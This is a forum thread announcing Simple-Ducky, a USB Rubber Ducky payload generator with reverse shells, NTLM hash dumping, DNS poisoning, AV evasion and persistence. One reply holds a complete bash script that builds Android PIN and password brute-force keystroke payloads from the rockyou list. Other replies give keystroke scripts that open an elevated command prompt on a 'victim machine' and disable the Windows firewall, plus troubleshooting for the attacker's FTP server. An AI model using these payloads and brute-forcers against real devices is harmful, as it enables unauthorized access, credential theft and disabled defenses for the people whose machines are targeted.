Jump to content

[Release] Simple-Ducky Payload Generator v1.1.1 (International Key Mapping|Kali Compatible|Custom Payload Builder)


Recommended Posts

Hello,
In lieu of usbrubberducky.com being down I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listener's.The Simple-Ducky currently uses version 2.6 of the duck encoder. The lastest version of the Simple-Ducky supports all Debian Linux distro's (i.e. Kali-Linux, Ubuntu, Linux Mint etc). The smart installer will take care of all the work for you.
With the simple-ducky in a matter of seconds you can;
* Create your evil executable (its automatically placed in your web directory)
* Create your inject.bin
* Launch a listener (meterpreter or netcat)
* Generate custom password list's
* Crack extracted passwords
* And so much more...

Note: This framework was designed to work with Kali Linux out of the box (JDK update is required and included with the simple-ducky). However, it should work with other Linux distro's as long as you install the required dependencies (see the wiki page for other than Kali installs).

Installation

Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal.The install script now supports all Debian based Linux distro's.

Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/

There are now two options to install the simple ducky....

Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q=
root@kali:~# chmod +x installer_v1.1.1_debian.sh
root@kali:~# ./installer_v1.1.1_debian.sh
root@kali:~# rm installer_v1.1.1_debian.sh

To run the program; root@kali:~# simple-ducky

Change Log

v1.1.1 Changes
1. Added tons of new features; Shells with dbd (incredibly powerful see video below) and the Custom Payload Builder

2. Cleaned up menu options, dependecies, and porcesses

3. Made bug fixes to several payloads

4. Replaced Netcat with Ncat

v1.1.0 Changes
1. Upgraded the encoder to version 2.6

2. Made changes to the main menu

3. Added a new payload: LM/NTLM Hash Dump from a Live System

4. Added a new function: LM/NTLM Password Hasher

5. Added a new tool: Site2lst Custom Wordlist Builder

6. Upgraded the installer: Now there is just one version of the Simple-Ducky that supports all Debian distro's (Tested on: Kali-Linux, Ubuntu and Linux Mint

v1.0.9 Changes
1. Added a new payload subset titled "Forced Phishing & Web Attacks"

2. Intergrated: SE-Toolkikt, Metasploit's Browser_Autopwn, and BurpSuite.

3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack

4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn

5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite

v1.0.8 Changes
1. Added OSX Single User Mode Reverse Shell Payload

2. Made minor scripting changes

3. Changed Encoder to version 2.5

4. Fixed bugs in the FTP Server Setup option

5. Created a User add function for the FTP Server Setup Option

v1.0.7 Changes

1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen)

v1.0.6 Changes

1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros)
* The purpose for the Kali-Edition is to follow the Debian compliance that Offensive-Security established in hopes of getting the Simple-Ducky prepacked in Kali-Linux. (Fingers-Crossed)
2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date)(Other-Linux version still has it)

3. Updated the Powershell Download & Execute Payloads to provide better obfuscation (tested on fully patched windows Vista/7/8 running McAfee)

4. Added a new function that configures the Pure-FTPD server for the user

v1.0.5 Changes
1. Complete Payload and Menu Revamp
v1.0.4 Changes
1. Added ~Persistence~ Payload
2. Updated Menu Options
v1.0.3 Changes
1. Payload Update
2. Added 64bit JDK Update Support
3. Added initial delay function (allows you to set a custom delay for driver install time).
4. Changed encoder version from 2.4 to 3.0
v1.0.2 Changes
1. International keyboard mapping added. -- Tester's would be greatly appreciated.
2. Aesthetic changes to text.
v1.0.1 Changes
1. Payload Update
2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload.

Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV!

Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to skyploit@gmail.com

~skysploit

post-41425-0-67155600-1365985775_thumb.p

post-41425-0-79233300-1365985780_thumb.p

post-41425-0-36410600-1365985785_thumb.p

post-41425-0-99957100-1365985788_thumb.p

post-41425-0-98575000-1365985792_thumb.p

Edited by skysploit
Link to comment
Share on other sites

  • Replies 85
  • Created
  • Last Reply

Top Posters In This Topic

Hi would this work with international keyboards ?

Version 1.0.2 now supports international keyboards. Please download it and try it out as I have not been able to test the payloads using international key mappings. Let me know if you have any issues getting it to run.

Edited by skysploit
Link to comment
Share on other sites

  • 1 month later...

Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.

#!/bin/bash
#
# Payload-Generator version 1.0
# This tool is licensed under the GPLv3. Currently maintained by
# James Luther (CaptainHooligan)
#
# This tool is used to generate payloads for the USB Rubber Ducky
#
# ========================================================================
# Main Menu
# ========================================================================

main ()
{
dialog --backtitle "Ducky Payload Generator" --title "Main Menu" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Password "Brute Force Password" Pin "Brute Force Pin" About  "Display About" Exit "Quit " 2>/tmp/menuitem.$$

menuitem=`cat /tmp/menuitem.$$`

opt=$?

case $menuitem in
Pin) Pin;;
Password) Password;;
About) dialog --backtitle "Ducky Payload Generator" --title "About" --msgbox "\nThe Ducky Payload Generator is used to generate a number of payloads for the USB Rubber Ducky. As of right now it is just made to brute force Android passwords. Later pin brute forcing, reverse shell payloads, and whatever else we can think of will be added. Until then enjoy!\n\n Version: 1.0\n Licensed Under GPLv3\n Maintainted by CaptainHooligan" 15 70 && clear && main;;
Exit) clear;;
*) clear;;
esac
return
}
# ==========================================================================
# This is where the Encryption Brute Forcer is Generated
# ==========================================================================
Pin ()
{
dialog --backtitle "Ducky Payload Generator" --title "Pin Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Pin at Encryption Screen" Lock "Pin at Locked Screen" Main "Return to Main Menu" 2>/tmp/menuitem.$$

menuitem=`cat /tmp/menuitem.$$`

opt=$?

case $menuitem in
Encryption) clear && echo "Generating Encryption Screen Pin Brute Forcer Payload ..." && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android_brute-force_encryption.txt && java -jar duckencode.jar -i android_brute-force_encryption.txt && mv inject.bin android_brute-force_encryption.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_encryption.*;; 
Lock) clear && echo "Generating Lock Screen Pin Brute Forcer Payload ... " && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_lock.txt && java -jar duckencode.jar -i android_brute-force_lock.txt && mv inject.bin android_brute-force_lock.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_lock.*;;
Main) clear && main;;
*) clear ;;
esac
return
}
# =========================================================================
# This is where the Password Brute Forcer Menu is processed.
# =========================================================================
Password ()
{
dialog --backtitle "Ducky Payload Generator" --title "Password Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Password at Encryption Screen" Lock "Password at Locked Screen" Main "Return to Main Menu" 2>/tmp/menuitem.$$

menuitem=`cat /tmp/menuitem.$$`

opt=$?
case $menuitem in
Encryption) clear && Pword_Enc ;;
Lock) clear && Pword_Lck ;;
Main) clear && main ;;
*) clear ;;
esac
return
}
# ==========================================================================
# Password Encryption Screen Brute Forcer
# ==========================================================================
Pword_Enc ()
{
echo "Generating Encryption Screen Password Brute Forcer ..."
echo " "
echo DELAY 5000 > android-pword-encryption.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android-pword-encryption.txt
java -jar duckencode.jar -i android-pword-encryption.txt
mv inject.bin android-pword-encryption.bin
clear && ls -lart android-pword-encryption.*
return
}
# ==========================================================================
# Password Lock Screen Brute Forcer
# ==========================================================================
Pword_Lck ()
{
echo "Generating Lock Screen Password Brute Forcer ..."
echo " "
echo DELAY 5000 > android-pword-lock.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android-pword-lock.txt
java -jar duckencode.jar -i android-pword-lock.txt
mv inject.bin android-pword-lock.bin
clear && ls -lart android-pword-lock.*
return
}
# =====================================================================
# Prerequisite Checker
# =====================================================================
pre ()
{
echo -e "Verifying prerequisites are installed ... "
echo ""
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
        echo "Duckencode.jar not found on system. Please verify you have this installed."
        exit 1
        else
        echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
        PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
        echo "Bzip2 not found on system. Please verify you have this installed."
        exit 1
        else
        echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
        PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
        echo "Wget not found on system. Please verify you have this installed."
        exit 1
        else
        echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
        PATH=$PATH:$wgetdir
fi
echo ""
echo ""
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 rockyou.txt.bz2
echo ""
echo 1 > $HOME/.payloadgenerator
echo "All Prerequisites met. To continue press [Enter]."
read
main
return
}
# ==========================================================================
# Actual program running
# ==========================================================================
clear
echo " "
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
        echo "Sorry, you need super user access to run this script."
        exit 1
fi
echo " "
echo "Checking to see if you've met prerequisites before ..."
echo " "
if [ -f /root/.payloadgenerator ]
	then 
		check=`cat $HOME/.payloadgenerator`
		case $check in
		1) main;;
		0) pre;;
		*) pre;;
		esac
	else
		pre
fi
Edited by CaptainHooligan
Link to comment
Share on other sites

Hak5 crew,

Thanks so much for the shout-out on the show yesterday. The download count for the simple-ducky has gone up drastically in the last 24 hours... I put a new tool request on bugs.kali.org. Lets see if we can get it voted up and make a permanent mark for hak5 in Kali. I have already built a new version (not posted) that places the ducky folder in the /usr/share directory and create a sym link so that all you have to run is "simple-ducky" to start the payload generator.

CaptainHooligan,

Nice man... I will go through to see what I can add from your script in the next version of the simple-ducky.

Link to comment
Share on other sites

ASCII artist wanted! I'm looking to class up the main menu a little bit. I know there are some talented artists among the Hak5 community. The art should be in bash format, include the titled "Simple-Ducky Payload Generator" and include a duck of some sort. Send your art to skysploit@gmail.com

Link to comment
Share on other sites

demonjester, I just ran it and can confirm that there are no issues with the payload... Try rebooting the victim machine. The only issue that i can see is that the script is running too fast for the victim machine. You can modify the delays in the conf file by opening /ducky/encoder/payloads/persistenceVIS7nouac.conf with any text editor. Currently this is how all of the vista/7 without UAC payloads open a command prompt. If the consensus is that there needs to be longer delay's I will modify all the conf in the next build which will be available soon.

~skysploit

ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 800
ENTER
Link to comment
Share on other sites

Im having the same problem as demonjester. Rebooting and increasing the delays does not help. By the way, im testing this on a Virtual Machine running win7 and Simple-Ducky v1.0.6

-*azren*-

Edited by azren
Link to comment
Share on other sites

Hmmm, sorry to hear that you are having issues. We are going to figure this out.... I assume by the screenshot that you are running US key mapping? Are you getting the same results with other payloads? How long of an entry delay are you using?

Edited by skysploit
Link to comment
Share on other sites

Hmmm, sorry to hear that you are having issues. We are going to figure this out.... I assume by the screenshot that you are running US key mapping? Are you getting the same results with other payloads? How long of an entry delay are you using?

Yes I'm running US key mapping and other payloads that I test as below also having the same issue.

  • 2. Persistence Reverse Shell w/o UAC (Win Vista/7)
  • 7. Windows Reverse Shell w/o UAC (No Download|Win Vista/7)
  • 12. Powershell Download & Execute w/o UAC (Admin Priv Shell|Win Vista/7)

Anyway, adding DELAY 400 after "STRING a" and "ENTER" solved this issue.

ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 400
ENTER
DELAY 400
STRING netsh firewall set opmode disable
Thanks for your help.
-*azren*-
Link to comment
Share on other sites

azren,

Thanks for the feedback. I posted an updated version on the Google code page. If you already have v1.0.6 installed you can just download v1.0.7 and either replace the ducky directory (/usr/share/ducky) with the new one, or run the install.sh script again. It will probably give you an error about the symbolic link, that's ok as it's just letting your know that the symbolic link already exists.

~skysploit

Edited by skysploit
Link to comment
Share on other sites

When I tried to set a password that started with a capital letter, I think it just pressed enter without letting me actually type my full password. Actually, I think it just automatically goes, even without me typing anything. Here's the output:

Please set a password for DrDinosaur

/usr/bin/simple-ducky: line 2357: pure-pw: command not found
/usr/bin/simple-ducky: line 2358: pure-pw: command not found
/usr/bin/simple-ducky: line 2359: cd: /etc/pure-ftpd/auth/: No such file or directory
Creating you home directory, it will reside at /ftphome/

Starting the FTP server. To test your new account, in a new terminal type: ftp 127.0.0.1

/usr/bin/simple-ducky: line 2369: /etc/init.d/pure-ftpd: No such file or directory

I tried to set it up again, but it says the username already exists.

Edited by DrDinosaur
Link to comment
Share on other sites

Are you able to login to your server? You can remove group, account, and all the other configuration settings by running the folllowing...

root@kali:~# pure-pw userdel <username>
root@kali:~# userdel ftpuser
root@kali:~# groupdel ftpgroup
root@kali:~# rm /etc/pure-ftpd/auth/60pdb
root@kali:~# rmdir /ftphome/

Try running it again... Typically for my attacking machines ftp server I use the creds of:

username: hacker
password: hacker

The reason for this is because the commands are going to be run on the victims machine so you don't your everyday account to get comprised or possibly your real name... On another note, I just went back through setup mine up using a 12 character password with uppercase, lowercase, special characters and numbers.

I have added this fix to the wiki page: https://code.google.com/p/simple-ducky-payload-generator/w/list

Hope this helps,

~skysploit

Edited by skysploit
Link to comment
Share on other sites

  • 2 weeks later...

I get the following error on all payloads that I try to generate on Kali 1.0.3 VM (I have already updated 64 bit java)


Exception in thread "main" java.lang.UnsupportedClassVersionError: Encoder : Unsupported major.minor version 51.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClass(ClassLoader.java:634)
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
at java.net.URLClassLoader.defineClass(URLClassLoader.java:277)
at java.net.URLClassLoader.access$000(URLClassLoader.java:73)
at java.net.URLClassLoader$1.run(URLClassLoader.java:212)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:321)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:266)
Could not find the main class: Encoder. Program will exit.



The end result is that no inject.bin file is ever created. The payload.txt file is created; but I cannot manually from terminal use encoder to convert that to the inject.bin either. Kali linux has the pae kernel and should be considered 64 bit right? When I updated java should I have selected 32 bit? Could that be the cause of my grief?

UPDATE: Just tried this all out in BT5r3 with the other linux installer and I am getting the exact same error. I know it is 32 bit and I used the 32 bit java update option. I am not even getting the payload.txt generated in the ducky folder in BT5r3. Also, when installing dependencies it downloaded the latest 64 bit metasploit installer; but MSF is already installed and fully updated. Should I bother running this installer? I fear it will bork up my MSF install. Thanks for all who respond! :)

Edited by TeCHemically
Link to comment
Share on other sites

Ok, it seems that this issue is caused by the java environment variable pointing to the wrong version. How can I change this variable to point to the 1.7.0 java version that simple ducky installs?

List available java implementations

$ update-java-alternatives --list

Use openjdk-6

$ update-java-alternatives --set java-6-openjdk

Use the non-free sun java.

$ update-java-alternatives --set java-6-sun

Use the non-free sun java only for the web plugin

$ update-java-alternatives --plugin --set java-6-sun
Link to comment
Share on other sites

Hello guys,

i am new to the rubber-ducky community and doing my first steps with the quack.

so at first, my envoironment:

root@kali:~# cat kali
PRETTY_NAME="Kali GNU/Linux 1.0"
NAME="Kali GNU/Linux"
ID=kali
VERSION="1.0"
VERSION_ID="1.0"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"
Distributor ID: Debian
Description: Debian GNU/Linux Kali Linux 1.0
Release: Kali Linux 1.0
Codename: n/a
Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali6 i686 GNU/Linux
Linux version 3.7-trunk-686-pae (debian-kernel@lists.debian.org) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Debian 3.7.2-0+kali6

i just updated the ducky to the firmware duck_v2.1.hex which works fine.

ok, here we go with the issues:

i tried to do the firmware update with windows 7 using the doc here:

http://code.google.com/p/ducky-decode/downloads/detail?name=The%20USB%20Rubber%20Ducky%20Draft.doc&can=2&q=

i tried to download the file http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip which should be around 20 Megs, in fact it isnt and i was unable to unpack it.

therefore i switched to my kali which works fine for flashing.

by the way, why i am here right now is the following:

i downloaded the simple ducky payload script from here:

https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=install_v1.0.9.sh&can=2&q=

chmod +x it and have this result, which looks fine for me:

-rwxr-xr-x 1 root root 700 May 2 09:34 install_v1.0.9.sh

now, the problem: after running ./install_v1.0.9.sh the following message comes up:

bash: ./install_v1.0.9.sh: /bin/bash^M: bad interpreter: No such file or directory

so, i tried with the sh before so my command looks like this: sh ./bash: ./install_v1.0.9.sh and the following errors are shown:

root@kali:~/work/rubberducky# sh ./install_v1.0.9.sh
-e \e[1;34mPlease wait while I download and install the Simple-Ducky Payload Generator\e[0m
--2013-05-02 10:04:15-- http://simple-ducky-payload-generator.googlecode.com/files/simple-ducky-v1.0.9-kali-edition.tar.gz%0D
Resolving simple-ducky-payload-generator.googlecode.com (simple-ducky-payload-generator.googlecode.com)... 173.194.70.82, 2a00:1450:4001:c02::52
Connecting to simple-ducky-payload-generator.googlecode.com (simple-ducky-payload-generator.googlecode.com)|173.194.70.82|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2013-05-02 10:04:15 ERROR 404: Not Found.

tar: /usr/share\r: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
ln: failed to create symbolic link `/usr/bin/simple-ducky\r': File exists
rm: cannot remove `simple-ducky-v1.0.9-kali-edition.tar.gz\r': No such file or directory
: not found1.0.9.sh: 7: ./install_v1.0.9.sh: clear
-e \e[1;34mDone! Be sure to setup your Pure-FTPD server (option 6) and update JDK to v1.7.0 (option 7) prior to generating any payloads.\e[0m

-e \e[1;34mType: simple-ducky in the terminal to launch...\e[0m

so also looks very strange.

after that, i downloaded the file simple-ducky-v1.0.9-kali-edition.tar.gz

and placed it in the same directory as the install-script and tried again, with no luck.

i have no idea what the problem is....

regards

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...